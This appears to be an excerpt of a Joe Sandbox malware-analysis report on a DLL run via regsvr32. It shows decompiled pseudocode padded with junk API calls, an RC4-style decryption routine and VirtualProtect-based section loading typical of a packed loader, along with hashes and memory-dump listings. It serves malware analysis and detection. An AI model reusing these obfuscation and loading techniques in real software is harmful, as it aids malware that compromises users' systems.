										if( *((intOrPtr*)( *_t302 + 0x28)) == 0) {
											 *((intOrPtr*)(_t302 + 0x38)) = 0;
											return _t302;
										}
										_push(0x22b9);
										_push(L"xadqsavcbdfewescGADW");
										_push(0);
										_push(_t447);
										_push(0x11d4);
										_push(0);
										if( *((intOrPtr*)(_t302 + 0x14)) == 0) {
											 *((intOrPtr*)(_v64 + 0x38)) = GetCurrencyFormatW() *  *0x100440d0 +  *((intOrPtr*)( *_v64 + 0x28)) + _v56;
										} else {
											_t306 = GetCurrencyFormatW();
											_t307 = _v64;
											 *0x10046a88 = _t306 *  *0x100440d0 +  *((intOrPtr*)( *_t307 + 0x28)) + _v56;
											 *((intOrPtr*)(_t307 + 0x10)) = 1;
										}
										return _v64;
									}
								}
								_a12(_v56, 0, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d4 + 0x8000, _a28);
								goto L1;
							}
							_t323 = GetCurrencyFormatW(_t223, 0x11d4, _t447, _t223, L"xadqsavcbdfewescGADW", 0x22b9);
							_v44 = _t323 *  *0x100440d0 + 0x2000;
							_t336 = _a8(0, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + _v52, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + 0x00001000 | _v44, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc + 4, _a28);
							_t449 =  &(_t449[5]);
							_v56 = _t336;
							if(_t336 == 0) {
								goto L1;
							}
							goto L18;
						}
						_v52 = _v52 + 0xc;
						do {
							_push(0x22b9);
							_push(L"xadqsavcbdfewescGADW");
							_push(0);
							_push(_t447);
							_push(0x11d4);
							_push(0);
							if( *((intOrPtr*)(_v52 + 4)) != 0) {
								_t343 = GetCurrencyFormatW() *  *0x100440d4 +  *_v52 +  *((intOrPtr*)(_v52 + 4));
							} else {
								_t343 = GetCurrencyFormatW() *  *0x100440d4 +  *_v52 + _v40;
							}
							_v60 = _t343;
							if(_v60 > GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + _v44) {
								_v44 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440cc + _v60;
							}
							_v48 = _v48 + 1;
							_v52 = _v52 + 0x28;
						} while (_v48 < GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc + ( *(_v56 + 6) & 0x0000ffff));
						goto L15;
					}
				}
				L1:
				return 0;
			}











































                                                                                                            0x100039a9
                                                                                                            0x100039c4
                                                                                                            0x100039d1
                                                                                                            0x100039d5
                                                                                                            0x10003a05
                                                                                                            0x10003a31
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10003a3f
                                                                                                            0x10003a7a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10003aa6
                                                                                                            0x10003abe
                                                                                                            0x00000000
                                                                                                            0x10003b11
                                                                                                            0x10003b1d
                                                                                                            0x10003b28
                                                                                                            0x10003b3e
                                                                                                            0x10003b4c
                                                                                                            0x10003b50
                                                                                                            0x10003b67
                                                                                                            0x10003c26
                                                                                                            0x10003c32
                                                                                                            0x10003c43
                                                                                                            0x10003c55
                                                                                                            0x10003c85
                                                                                                            0x10003c8a
                                                                                                            0x10003cb9
                                                                                                            0x10003cbd
                                                                                                            0x10003cf4
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10003d0b
                                                                                                            0x10003d29
                                                                                                            0x10003d7a
                                                                                                            0x10003d7e
                                                                                                            0x10003d83
                                                                                                            0x10003d87
                                                                                                            0x10003e14
                                                                                                            0x10003e20
                                                                                                            0x10003e39
                                                                                                            0x10003e5f
                                                                                                            0x10003e75
                                                                                                            0x10003e77
                                                                                                            0x10003e7b
                                                                                                            0x10003ebd
                                                                                                            0x10003ec0
                                                                                                            0x10003edb
                                                                                                            0x10003ee1
                                                                                                            0x10003ee5
                                                                                                            0x10003eec
                                                                                                            0x10003ef3
                                                                                                            0x10003f00
                                                                                                            0x10003f09
                                                                                                            0x10003f11
                                                                                                            0x10003f1b
                                                                                                            0x10003f3b
                                                                                                            0x10003f3e
                                                                                                            0x10003f72
                                                                                                            0x100041d1
                                                                                                            0x100041d5
                                                                                                            0x00000000
                                                                                                            0x100041da
                                                                                                            0x10003fe4
                                                                                                            0x10004001
                                                                                                            0x10004031
                                                                                                            0x1000405b
                                                                                                            0x1000407e
                                                                                                            0x10004081
                                                                                                            0x100040be
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100040d0
                                                                                                            0x100040d9
                                                                                                            0x100040e6
                                                                                                            0x100040e9
                                                                                                            0x100040ed
                                                                                                            0x10004155
                                                                                                            0x100040ef
                                                                                                            0x100040fb
                                                                                                            0x10004139
                                                                                                            0x10004150
                                                                                                            0x10004150
                                                                                                            0x10004181
                                                                                                            0x00000000
                                                                                                            0x100041e0
                                                                                                            0x100041e0
                                                                                                            0x100041eb
                                                                                                            0x10004244
                                                                                                            0x00000000
                                                                                                            0x10004244
                                                                                                            0x100041f0
                                                                                                            0x100041f1
                                                                                                            0x100041f6
                                                                                                            0x100041f7
                                                                                                            0x100041f8
                                                                                                            0x100041f9
                                                                                                            0x100041fa
                                                                                                            0x1000423b
                                                                                                            0x100041fc
                                                                                                            0x100041fc
                                                                                                            0x10004207
                                                                                                            0x10004214
                                                                                                            0x1000421a
                                                                                                            0x1000421a
                                                                                                            0x00000000
                                                                                                            0x1000423e
                                                                                                            0x10004181
                                                                                                            0x10003ea1
                                                                                                            0x00000000
                                                                                                            0x10003ea5
                                                                                                            0x10003d97
                                                                                                            0x10003db5
                                                                                                            0x10003e01
                                                                                                            0x10003e05
                                                                                                            0x10003e0a
                                                                                                            0x10003e0e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10003e0e
                                                                                                            0x10003b74
                                                                                                            0x10003b78
                                                                                                            0x10003b7c
                                                                                                            0x10003b7d
                                                                                                            0x10003b87
                                                                                                            0x10003b88
                                                                                                            0x10003b89
                                                                                                            0x10003b8a
                                                                                                            0x10003b8b
                                                                                                            0x10003bb1
                                                                                                            0x10003b8d
                                                                                                            0x10003b9c
                                                                                                            0x10003b9c
                                                                                                            0x10003bc0
                                                                                                            0x10003bd5
                                                                                                            0x10003bf0
                                                                                                            0x10003bf0
                                                                                                            0x10003bf4
                                                                                                            0x10003bf8
                                                                                                            0x10003c1c
                                                                                                            0x00000000
                                                                                                            0x10003b78
                                                                                                            0x10003abe
                                                                                                            0x10003a07
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100039D5
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100039EE
                                                                                                              • Part of subcall function 10001E20: GetCurrencyFormatW.KERNEL32 ref: 10001E38
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10003A1A
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10003A3F
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10003A63
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10003A88
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10003AAA
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10003AD0
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10003AFA
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10003B1D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrencyFormat
                                                                                                            • String ID: ($eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
                                                                                                            • API String ID: 3383288267-2712681272
                                                                                                            • Opcode ID: 6358d7462f08fcbe04848fd00b87f20519dc6db130516a4512fa2fb5f1ed022f
                                                                                                            • Instruction ID: be84b0d19bb5b2932066f15e7eca2fa00d7c74bd76f66a19a1550838f82622ea
                                                                                                            • Opcode Fuzzy Hash: 6358d7462f08fcbe04848fd00b87f20519dc6db130516a4512fa2fb5f1ed022f
                                                                                                            • Instruction Fuzzy Hash: 06428BB1604215BFE314DB91CD82FA7BFACEB8B788F024409F705DB292D771E8548A65
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100018D8 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 194COMMONLIBRARYCODE
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            C-Code - Quality: 87%
                                                                                                            			E100018D8(signed int _a4, signed int _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				intOrPtr* _v4;
				void* _v8;
				int _v12;
				void* _t78;
				signed int _t89;
				signed int _t111;
				signed int _t116;
				signed int _t117;
				signed int _t120;
				int _t129;
				short* _t159;

				_t129 = 0x22b9;
				_t159 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
				_v12 = 0;
				_a8 = _a4 - _a12 + _a8;
				_t78 = malloc(GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", 0x22b9) * _a8 *  *0x100440d0 + 0x4708); // executed
				_v8 = _t78;
				_a12 = 0;
				if(GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", 0x22b9) * _a8 *  *0x100440e0 + 0x4708 > 0) {
					do {
						_t116 = GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", _t129);
						_t117 = _a12;
						 *(_t116 * _a8 *  *0x100440d0 + _t117 + _a16) = _t117;
						_a4 = _t117 % _a24;
						_t120 = GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", _t129);
						_t129 = 0x22b9;
						 *((char*)(_v8 + _t120 * _a8 *  *0x100440d8 + _a12)) =  *((intOrPtr*)(_a4 + _a20));
						GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						_a12 = _a12 + 1;
					} while (_a12 < GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", 0x22b9) * _a8 *  *0x100440e0 + 0x4708);
				}
				_a12 = _a12 & 0x00000000;
				do {
					_a4 =  *((char*)(_v8 + GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", _t129) * _a8 *  *0x100440d4 + _a12));
					_t89 = GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", _t129);
					asm("cdq");
					_v12 = (( *(_t89 * _a8 *  *0x100440d8 + _a12 + _a16) & 0x000000ff) + _a4 + _v12) % 0x4708;
					_a4 =  *((intOrPtr*)(GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", _t129) * _a8 *  *0x100440e0 + _a12 + _a16));
					_v4 = GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", _t129) * _a8 *  *0x100440e0 + _v12 + _a16;
					 *((char*)(GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", _t129) * _a8 *  *0x100440d0 + _a12 + _a16)) =  *_v4;
					_t111 = GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", _t129);
					_a12 = _a12 + 1;
					 *((char*)(_t111 * _a8 *  *0x100440dc + _v12 + _a16)) = _a4;
				} while (_a12 < 0x4708);
				return  *0x10046a64(_v8);
			}














                                                                                                            0x100018f1
                                                                                                            0x100018ff
                                                                                                            0x1000190e
                                                                                                            0x10001912
                                                                                                            0x1000192a
                                                                                                            0x10001937
                                                                                                            0x10001941
                                                                                                            0x1000195a
                                                                                                            0x10001960
                                                                                                            0x1000196c
                                                                                                            0x10001980
                                                                                                            0x10001986
                                                                                                            0x1000199d
                                                                                                            0x100019a1
                                                                                                            0x100019c2
                                                                                                            0x100019d3
                                                                                                            0x100019d6
                                                                                                            0x100019d8
                                                                                                            0x100019fb
                                                                                                            0x10001960
                                                                                                            0x10001a05
                                                                                                            0x10001a0a
                                                                                                            0x10001a3c
                                                                                                            0x10001a40
                                                                                                            0x10001a68
                                                                                                            0x10001a76
                                                                                                            0x10001a9f
                                                                                                            0x10001ac5
                                                                                                            0x10001af1
                                                                                                            0x10001af4
                                                                                                            0x10001b0a
                                                                                                            0x10001b1a
                                                                                                            0x10001b1a
                                                                                                            0x10001b35

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrencyFormat$??3@malloc
                                                                                                            • String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
                                                                                                            • API String ID: 203256951-3161301136
                                                                                                            • Opcode ID: a0604d6b19201fa23fe871278798098373fce57cb70cfb09eb1f26b7c660e828
                                                                                                            • Instruction ID: fba73ffc0b4bb754e4a8c3637f8b73e63a87aae8de5c3fee8d95280e19d6a203
                                                                                                            • Opcode Fuzzy Hash: a0604d6b19201fa23fe871278798098373fce57cb70cfb09eb1f26b7c660e828
                                                                                                            • Instruction Fuzzy Hash: 9F615A71508350AFE304DB11CD91F5BBFE9EBCA748F05590EF684AB2A1C731EA148E26
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000227A Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 172COMMONLIBRARYCODE
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            C-Code - Quality: 85%
                                                                                                            			E1000227A(void** __ebx, intOrPtr* _a4) {
				signed int _v8;
				signed int _t47;
				signed int _t48;
				signed int _t49;
				signed int _t60;
				signed int _t66;
				signed int _t68;
				int _t74;
				void** _t84;
				short* _t103;
				void* _t119;

				_t84 = __ebx;
				if(__ebx[2] != 0) {
					_t106 = 0x22b9;
					if((__ebx[3] & GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + 0x02000000) == 0) {
						_t47 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9);
						asm("sbb esi, esi");
						_t48 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9);
						asm("sbb edi, edi");
						_t49 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9);
						asm("sbb eax, eax");
						_t103 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
						_v8 =  *((intOrPtr*)(0x10046a90 + ( ~( ~(_t49 *  *0x100440e0 - 0x80000000 & __ebx[3])) + ( ~( ~(_t48 *  *0x100440e0 + 0x40000000 & __ebx[3])) +  ~( ~(_t47 *  *0x100440d4 + 0x20000000 & __ebx[3])) * 2) * 2) * 4));
						if((__ebx[3] & GetCurrencyFormatW(0, 0x11d4, _t103, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + 0x04000000) != 0) {
							_v8 = _v8 | GetCurrencyFormatW(0, 0x11d4, _t103, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 + 0x00000200;
						}
						_t60 = GetCurrencyFormatW(0, 0x11d4, _t103, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						_t66 = VirtualProtect( *_t84, _t84[2] + GetCurrencyFormatW(0, 0x11d4, _t103, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0, _v8, _t119 + 0x10 + _t60 *  *0x100440d8 * 4); // executed
						asm("sbb eax, eax");
						_t68 =  ~( ~_t66);
						L13:
						return _t68;
					}
					if( *__ebx != __ebx[1]) {
						L9:
						_t68 = 1;
						goto L13;
					}
					_t74 = 0;
					if(__ebx[4] != 0 ||  *((intOrPtr*)( *_a4 + 0x38)) ==  *(_a4 + 0x3c)) {
						L8:
						 *((intOrPtr*)(_a4 + 0x20))( *_t84, _t84[2], GetCurrencyFormatW(_t74, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", _t74, L"xadqsavcbdfewescGADW", _t106) *  *0x100440e0 + 0x4000,  *((intOrPtr*)(_a4 + 0x34)));
						goto L9;
					} else {
						if(GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + __ebx[2] %  *(_a4 + 0x3c) != 0) {
							goto L9;
						}
						_t106 = 0x22b9;
						_t74 = 0;
						goto L8;
					}
				}
				return 1;
			}














                                                                                                            0x1000227a
                                                                                                            0x10002281
                                                                                                            0x10002292
                                                                                                            0x100022bb
                                                                                                            0x10002358
                                                                                                            0x10002380
                                                                                                            0x10002386
                                                                                                            0x100023b2
                                                                                                            0x100023b8
                                                                                                            0x100023d5
                                                                                                            0x100023de
                                                                                                            0x100023f6
                                                                                                            0x1000240b
                                                                                                            0x1000242b
                                                                                                            0x1000242b
                                                                                                            0x1000243f
                                                                                                            0x10002470
                                                                                                            0x10002478
                                                                                                            0x1000247a
                                                                                                            0x1000247c
                                                                                                            0x00000000
                                                                                                            0x1000247e
                                                                                                            0x100022c6
                                                                                                            0x10002340
                                                                                                            0x10002342
                                                                                                            0x00000000
                                                                                                            0x10002342
                                                                                                            0x100022c8
                                                                                                            0x100022cd
                                                                                                            0x1000230d
                                                                                                            0x1000233a
                                                                                                            0x00000000
                                                                                                            0x100022dd
                                                                                                            0x10002304
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10002306
                                                                                                            0x1000230b
                                                                                                            0x00000000
                                                                                                            0x1000230b
                                                                                                            0x100022cd
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100022AA
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100022EB
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10002322
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrencyFormat
                                                                                                            • String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
                                                                                                            • API String ID: 3383288267-3161301136
                                                                                                            • Opcode ID: 1879c51a0ca35df28eb5a6be710fe34797454b6d8926430bf9f23c6529057236
                                                                                                            • Instruction ID: 001e048e4435a5d91bd341ad1d3e9c5f26db428d8a62d425f6a780c80bac8da3
                                                                                                            • Opcode Fuzzy Hash: 1879c51a0ca35df28eb5a6be710fe34797454b6d8926430bf9f23c6529057236
                                                                                                            • Instruction Fuzzy Hash: E651E1726002117FE301CB50CD86F97BBA9EB8B751F158418FB06EF191D730A864CBA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10010763 Relevance: 16.6, APIs: 11, Instructions: 103memoryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            C-Code - Quality: 80%
                                                                                                            			E10010763() {
				struct _CRITICAL_SECTION* _v4;
				char _v28;
				char _v36;
				char _v44;
				intOrPtr _v56;
				void* __ebx;
				intOrPtr __ecx;
				signed int __edi;
				void* __esi;
				void* __ebp;
				struct _CRITICAL_SECTION* _t39;
				intOrPtr _t40;
				void* _t41;
				long _t44;
				void* _t45;
				signed int* _t51;
				intOrPtr _t64;
				long _t68;
				void* _t69;
				void* _t70;
				signed int _t72;
				intOrPtr _t78;
				signed int _t82;
				void* _t86;
				signed int _t88;
				void* _t90;
				void* _t91;
				void* _t93;

				_push(_t72);
				_push(_t69);
				_push(_t88);
				_t86 = _t72;
				_t1 = _t86 + 0x1c; // 0x10048600
				_t39 = _t1;
				_v4 = _t39;
				EnterCriticalSection(_t39);
				_t3 = _t86 + 4; // 0x20
				_t40 =  *_t3;
				_t4 = _t86 + 8; // 0x3
				_t82 =  *_t4;
				if(_t82 >= _t40) {
					L7:
					_t82 = 1;
					__eflags = _t40 - 1;
					if(_t40 <= 1) {
						L12:
						_t21 = _t40 + 0x20; // 0x40
						_t88 = _t21;
						_t22 = _t86 + 0x10; // 0x8769f8
						_t41 =  *_t22;
						__eflags = _t41;
						if(__eflags != 0) {
							_t69 = GlobalHandle(_t41);
							GlobalUnlock(_t69);
							_t44 = E100010C9(_t72, __eflags, _t88, 8);
							_t72 = 0x2002;
							_t45 = GlobalReAlloc(_t69, _t44, ??);
						} else {
							_t68 = E100010C9(_t72, __eflags, _t88, 8);
							_pop(_t72);
							_t45 = GlobalAlloc(2, _t68); // executed
						}
						__eflags = _t45;
						if(_t45 != 0) {
							_t70 = GlobalLock(_t45);
							_t25 = _t86 + 4; // 0x20
							__eflags = _t88 -  *_t25 << 3;
							E10020F40(_t82, _t70 +  *_t25 * 8, 0, _t88 -  *_t25 << 3);
							 *(_t86 + 4) = _t88;
							 *(_t86 + 0x10) = _t70;
							goto L20;
						} else {
							_t23 = _t86 + 0x10; // 0x8769f8
							_t86 =  *_t23;
							__eflags = _t86;
							if(_t86 != 0) {
								GlobalLock(GlobalHandle(_t86));
							}
							LeaveCriticalSection(_v4);
							_push(_t88);
							_t90 = _t93;
							_push(_t72);
							_v28 = 0x100442e0;
							E100209E8( &_v28, 0x1003e1e4);
							asm("int3");
							_push(_t90);
							_t91 = _t93;
							_push(_t72);
							_v36 = 0x10044378;
							E100209E8( &_v36, 0x1003e298);
							asm("int3");
							_push(_t91);
							_push(_t72);
							_v44 = 0x10044410;
							E100209E8( &_v44, 0x1003e2dc);
							asm("int3");
							_push(4);
							E1001FBC4(E10032E9B, _t69, _t82, _t86);
							_t78 = E100105C8(0x104);
							_v56 = _t78;
							_t64 = 0;
							_v44 = 0;
							if(_t78 != 0) {
								_t64 = E1000E58E(_t78);
							}
							return E1001FC9C(_t64);
						}
					} else {
						_t18 = _t86 + 0x10; // 0x8769f8
						_t72 =  *_t18 + 8;
						__eflags = _t72;
						while(1) {
							__eflags =  *_t72 & 0x00000001;
							if(( *_t72 & 0x00000001) == 0) {
								break;
							}
							_t82 = _t82 + 1;
							_t72 = _t72 + 8;
							__eflags = _t82 - _t40;
							if(_t82 < _t40) {
								continue;
							}
							break;
						}
						__eflags = _t82 - _t40;
						if(_t82 < _t40) {
							goto L20;
						} else {
							goto L12;
						}
					}
				} else {
					_t13 = __esi + 0x10; // 0x8769f8
					__ecx =  *_t13;
					__eflags =  *(__ecx + __edi * 8) & 0x00000001;
					if(( *(__ecx + __edi * 8) & 0x00000001) == 0) {
						L20:
						_t30 = _t86 + 0xc; // 0x3
						__eflags = _t82 -  *_t30;
						if(_t82 >=  *_t30) {
							_t31 = _t82 + 1; // 0x4
							 *((intOrPtr*)(_t86 + 0xc)) = _t31;
						}
						_t33 = _t86 + 0x10; // 0x8769f8
						_t51 =  *_t33 + _t82 * 8;
						 *_t51 =  *_t51 | 0x00000001;
						__eflags =  *_t51;
						_t37 = _t82 + 1; // 0x4
						 *(_t86 + 8) = _t37;
						LeaveCriticalSection(_v4);
						return _t82;
					} else {
						goto L7;
					}
				}
			}































                                                                                                            0x10010763
                                                                                                            0x10010764
                                                                                                            0x10010765
                                                                                                            0x10010767
                                                                                                            0x10010769
                                                                                                            0x10010769
                                                                                                            0x1001076e
                                                                                                            0x10010772
                                                                                                            0x10010778
                                                                                                            0x10010778
                                                                                                            0x1001077b
                                                                                                            0x1001077b
                                                                                                            0x10010780
                                                                                                            0x1001078f
                                                                                                            0x10010791
                                                                                                            0x10010792
                                                                                                            0x10010794
                                                                                                            0x100107b1
                                                                                                            0x100107b1
                                                                                                            0x100107b1
                                                                                                            0x100107b4
                                                                                                            0x100107b4
                                                                                                            0x100107b7
                                                                                                            0x100107b9
                                                                                                            0x100107d7
                                                                                                            0x100107da
                                                                                                            0x100107e8
                                                                                                            0x100107ee
                                                                                                            0x100107f1
                                                                                                            0x100107bb
                                                                                                            0x100107be
                                                                                                            0x100107c4
                                                                                                            0x100107c8
                                                                                                            0x100107c8
                                                                                                            0x100107f7
                                                                                                            0x100107f9
                                                                                                            0x10010826
                                                                                                            0x10010828
                                                                                                            0x1001082f
                                                                                                            0x10010839
                                                                                                            0x10010841
                                                                                                            0x10010844
                                                                                                            0x00000000
                                                                                                            0x100107fb
                                                                                                            0x100107fb
                                                                                                            0x100107fb
                                                                                                            0x100107fe
                                                                                                            0x10010800
                                                                                                            0x1001080a
                                                                                                            0x1001080a
                                                                                                            0x10010814
                                                                                                            0x10004e3a
                                                                                                            0x10004e3b
                                                                                                            0x10004e3d
                                                                                                            0x10004e47
                                                                                                            0x10004e4e
                                                                                                            0x10004e53
                                                                                                            0x10004e54
                                                                                                            0x10004e55
                                                                                                            0x10004e57
                                                                                                            0x10004e61
                                                                                                            0x10004e68
                                                                                                            0x10004e6d
                                                                                                            0x10004e6e
                                                                                                            0x10004e71
                                                                                                            0x10004e7b
                                                                                                            0x10004e82
                                                                                                            0x10004e87
                                                                                                            0x10004e88
                                                                                                            0x10004e8f
                                                                                                            0x10004e9e
                                                                                                            0x10004ea0
                                                                                                            0x10004ea3
                                                                                                            0x10004ea7
                                                                                                            0x10004eaa
                                                                                                            0x10004eac
                                                                                                            0x10004eac
                                                                                                            0x10004eb6
                                                                                                            0x10004eb6
                                                                                                            0x10010796
                                                                                                            0x10010796
                                                                                                            0x10010799
                                                                                                            0x10010799
                                                                                                            0x1001079c
                                                                                                            0x1001079c
